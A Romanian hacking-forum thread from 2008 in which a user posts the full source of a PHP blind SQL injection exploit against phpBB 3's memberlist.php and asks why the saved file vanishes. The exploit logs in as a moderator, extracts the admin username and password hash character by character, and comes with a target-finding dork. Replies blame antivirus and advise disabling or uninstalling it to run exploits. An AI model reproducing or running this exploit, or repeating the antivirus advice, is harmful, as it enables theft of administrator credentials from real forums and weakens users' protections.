shakur20 Posted June 25, 2008 Report Share Posted June 25, 2008 salut.Am si eu o mica problema.Am luat un exploit de pe millw0rm care are codul cam asa:#!/usr/bin/php -q -d short_open_tag=on<?echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";echo "by rgod rgod@autistici.org\n";echo "site: http://retrogod.altervista.org\n";echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";/*works regardless of php.ini settingsyou need a global moderator account with "simple moderator" role*/if ($argc<5) {echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";echo "host: target server (ip/hostname)\n";echo "path: path to phpbb3\n";echo "user/pass: u need a valid user account with global moderator rights\n";echo "Options:\n";echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";echo " -p[port]: specify a port other than 80\n";echo " -P[ip:port]: specify a proxy\n";echo " -u[number]: specify a user id other than 2 (admin)\n";echo " -x: disclose table prefix through error messages\n";echo "Example:\r\n";echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";die;}error_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",5);function quick_dump($string){ $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result;}$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\';function sendpacketii($packet){ global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html;}$host=$argv[1];$path=$argv[2];$user=$argv[3];$pass=$argv[4];$port=80;$prefix="PHPBB_";$user_id="2";//admin$discl=0;$proxy="";for ($i=3; $i<=$argc-1; $i++){$temp=$argv[$i][0].$argv[$i][1];if ($temp=="-p"){ $port=str_replace("-p","",$argv[$i]);}if ($temp=="-P"){ $proxy=str_replace("-P","",$argv[$i]);}if ($temp=="-T"){ $prefix=str_replace("-T","",$argv[$i]);}if ($temp=="-u"){ $user_id=str_replace("-u","",$argv[$i]);}if ($temp=="-x"){ $discl=1;}}if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}$data="username=".urlencode($user);$data.="&password=".urlencode($pass);$data.="&redirect=index.php";$data.="&login=Login";$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";$packet.="Content-Type: application/x-www-form-urlencoded\r\n";$packet.="Accept-Encoding: text/plain\r\n";$packet.="Host: ".$host."\r\n";$packet.="Content-Length: ".strlen($data)."\r\n";$packet.="Connection: Close\r\n\r\n";$packet.=$data;sendpacketii($packet);$cookie="";$temp=explode("Set-Cookie: ",$html);for ($i=1; $i<=count($temp)-1; $i++){ $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0];}if (eregi("_u=1;",$cookie)){//echo $html."\n";//debug//die("Unable to login...");}echo "cookie -> ".$cookie."\r\n";if ($discl){$sql="'suntzuuuuu";echo "sql -> ".$sql."\n";$sql=urlencode(strtoupper($sql));$data="username=";$data.="&icq=";$data.="&email=";$data.="&aim=";$data.="&joined_select=lt";$data.="&joined=";$data.="&yahoo=";$data.="&active_select=lt";$data.="&active=";$data.="&msn=";$data.="&count_select=eq";$data.="&count=";$data.="&jabber=";$data.="&sk=c";$data.="&sd=a";$data.="&ip=".$sql;$data.="&search_group_id=0";$data.="&submit=Search";$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";$packet.="Content-Type: application/x-www-form-urlencoded\r\n";$packet.="Host: ".$host."\r\n";$packet.="Content-Length: ".strlen($data)."\r\n";$packet.="Connection: Close\r\n";$packet.="Cookie: ".$cookie." \r\n\r\n";$packet.=$data;sendpacketii($packet);if (strstr($html,"You have an error in your SQL syntax")){$temp=explode("posts",$html);$temp2=explode(" ",$temp[0]);$prefix=strtoupper($temp2[count($temp2)-1]);echo "prefix -> ".$prefix."\n";sleep(2);}}$md5s[0]=0;//null$md5s=array_merge($md5s,range(48,57)); //numbers$md5s=array_merge($md5s,range(97,102));//a-f letters//print_r(array_values($md5s));$j=1;$password="";while (!strstr($password,chr(0))){for ($i=0; $i<=255; $i++){if (in_array($i,$md5s)){ $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");}}$j++;}$j=1;$admin="";while (!strstr($admin,chr(0))){for ($i=0; $i<=255; $i++){ $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");}$j++;}echo "--------------------------------------------------------------------\r\n";echo "admin -> ".$admin."\r\n";echo "password (md5) -> ".$password."\r\n";echo "--------------------------------------------------------------------\r\n";function is_hash($hash){ if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;}}if (is_hash($password)) {echo "Exploit succeeded...";}else {echo "Exploit failed...";}?>problema e ca nu pot sa il salvez ca nume_exploit.pl pentru ca pur si simplu dispare la 1 ms dupa salvare.Ce pot sa fac? Quote Link to comment Share on other sites More sharing options...
SirGod Posted June 25, 2008 Report Share Posted June 25, 2008 In primul rand nu e exploit de PHPBB 3 . E de Woltlab Burning Board 2.X.Il salvezi ca exploit.pl ,il muti in c:/perl/ intri in CMD si scri:cd\cd perlperl exploit.pl Quote Link to comment Share on other sites More sharing options...
shakur20 Posted June 25, 2008 Author Report Share Posted June 25, 2008 pai atunci cand vreau sa il salvezi ca exploit.pl in c:\perl ,imi dispare dupa 1ms fisierul exploit.pl,pur si simplu nu apare in folder!!! Quote Link to comment Share on other sites More sharing options...
shinnok Posted June 25, 2008 Report Share Posted June 25, 2008 Vezi poate ti-l mananca antivirusul.Uita-te in logurile lui daca ai antivirus. Quote Link to comment Share on other sites More sharing options...
shakur20 Posted June 25, 2008 Author Report Share Posted June 25, 2008 cool!!! nod32 sucks:| thx close and delete please. Quote Link to comment Share on other sites More sharing options...
moubik Posted June 25, 2008 Report Share Posted June 25, 2008 invata programare.. Quote Link to comment Share on other sites More sharing options...
CODEX Posted June 25, 2008 Report Share Posted June 25, 2008 Dap e de la anitivrus ! Si eu am tot asa si opresc antivirusul cand e nevoie Quote Link to comment Share on other sites More sharing options...
SirGod Posted June 26, 2008 Report Share Posted June 26, 2008 Scuze,am gresit nu m-am uitat la exploit sa vad <?php m-am uitat la ala al tau cu exploit.pl Quote Link to comment Share on other sites More sharing options...
puskin Posted July 13, 2008 Report Share Posted July 13, 2008 voi nu stiti sa cititi..:/*works regardless of php.ini settingsyou need a global moderator account with "simple moderator" role*/ Quote Link to comment Share on other sites More sharing options...
excess Posted July 13, 2008 Report Share Posted July 13, 2008 dezinstaleaza antivirusu , restarteaza calculatoru si vei putea sa'l salvezi . Daca va tot place sa va jucati cu exploituri lasatile dracu de av-uri . Quote Link to comment Share on other sites More sharing options...